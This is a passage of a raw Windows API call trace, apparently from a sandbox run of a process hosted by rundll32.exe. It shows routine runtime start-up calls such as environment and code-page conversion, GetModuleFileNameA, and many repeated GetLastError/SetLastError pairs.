cchWideChar=1291, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1291 [0145.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x50b) returned 0x4797f00 [0145.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1291, lpMultiByteStr=0x4797f00, cbMultiByte=1291, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1291 [0145.251] FreeEnvironmentStringsW (penv=0x47974e0) returned 1 [0145.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x478a018 [0145.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x800) returned 0x47974e0 [0145.251] GetStartupInfoW (in: lpStartupInfo=0xdf7b0 | out: lpStartupInfo=0xdf7b0*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\SysWOW64\\rundll32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x9b29dec4, hStdOutput=0xdf824, hStdError=0x68a99f38)) [0145.251] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0145.252] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0145.252] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0145.252] GetLastError () returned 0x7f [0145.252] SetLastError (dwErrCode=0x7f) [0145.252] GetLastError () returned 0x7f [0145.252] SetLastError (dwErrCode=0x7f) [0145.252] GetLastError () returned 0x7f [0145.252] SetLastError (dwErrCode=0x7f) [0145.252] GetACP () returned 0x4e4 [0145.252] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x220) returned 0x4798418 [0145.252] GetLastError () returned 0x7f [0145.252] SetLastError (dwErrCode=0x7f) [0145.252] IsValidCodePage (CodePage=0x4e4) returned 1 [0145.252] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xdf7b4 | out: lpCPInfo=0xdf7b4) returned 1 [0145.252] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xdf27c | out: lpCPInfo=0xdf27c) returned 1 [0145.253] GetLastError () returned 0x7f [0145.253] SetLastError (dwErrCode=0x7f) [0145.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdf690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0145.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdf690, cbMultiByte=256, lpWideCharStr=0xdeff8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0145.253] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0xdf290 | out: lpCharType=0xdf290) returned 1 [0145.254] GetLastError () returned 0x7f [0145.254] SetLastError (dwErrCode=0x7f) [0145.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdf690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0145.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdf690, cbMultiByte=256, lpWideCharStr=0xdefc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0145.254] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0145.254] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0xdedb8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0145.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0xdf590, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ°É\x8foÌ÷\r", lpUsedDefaultChar=0x0) returned 256 [0145.254] GetLastError () returned 0x7f [0145.254] SetLastError (dwErrCode=0x7f) [0145.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdf690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0145.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xdf690, cbMultiByte=256, lpWideCharStr=0xdefe8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䉏梩Ā") returned 256 [0145.254] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䉏梩Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0145.254] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䉏梩Ā", cchSrc=256, lpDestStr=0xdedd8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0145.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0xdf490, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ°É\x8foÌ÷\r", lpUsedDefaultChar=0x0) returned 256 [0145.254] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x68abc640, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20 [0145.254] GetLastError () returned 0x0 [0145.254] SetLastError (dwErrCode=0x0) [0145.254] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.255] GetLastError () returned 0x0 [0145.255] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.256] SetLastError (dwErrCode=0x0) [0145.256] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.257] SetLastError (dwErrCode=0x0) [0145.257] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.258] GetLastError () returned 0x0 [0145.258] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.259] SetLastError (dwErrCode=0x0) [0145.259] GetLastError () returned 0x0 [0145.260] SetLastError (dwErrCode=0x0) [0145.260] GetLastError () returned 0x0 [0145.260] SetLastError (dwErrCode=0x0) [0145.260] GetLastError () returned 0x0 [0145.260] SetLastError (dwErrCode=0x0) [0145.260] GetLastError () returned 0x0 [0145.260] SetLastError (dwErrCode=0x0) [0145.260] GetLastError () returned 0x0 [0145.260] SetLastError (dwErrCode=0x0) [0145.260] GetLastError () returned 0x0 [0145.260] SetLastError (dwErrCode=0x0) [0145.260] GetLastError () returned 0x0 [0145.260] SetLastError (dwErrCode=0x0) [0145.260] GetLastError () returned 0x0 [0145.260] SetLastError (dwErrCode=0x0) [0145.260] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.262] SetLastError (dwErrCode=0x0) [0145.262] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x70) returned 0x478dc00 [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.263] SetLastError (dwErrCode=0x0) [0145.263] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) [0145.264] GetLastError () returned 0x0 [0145.264] SetLastError (dwErrCode=0x0) 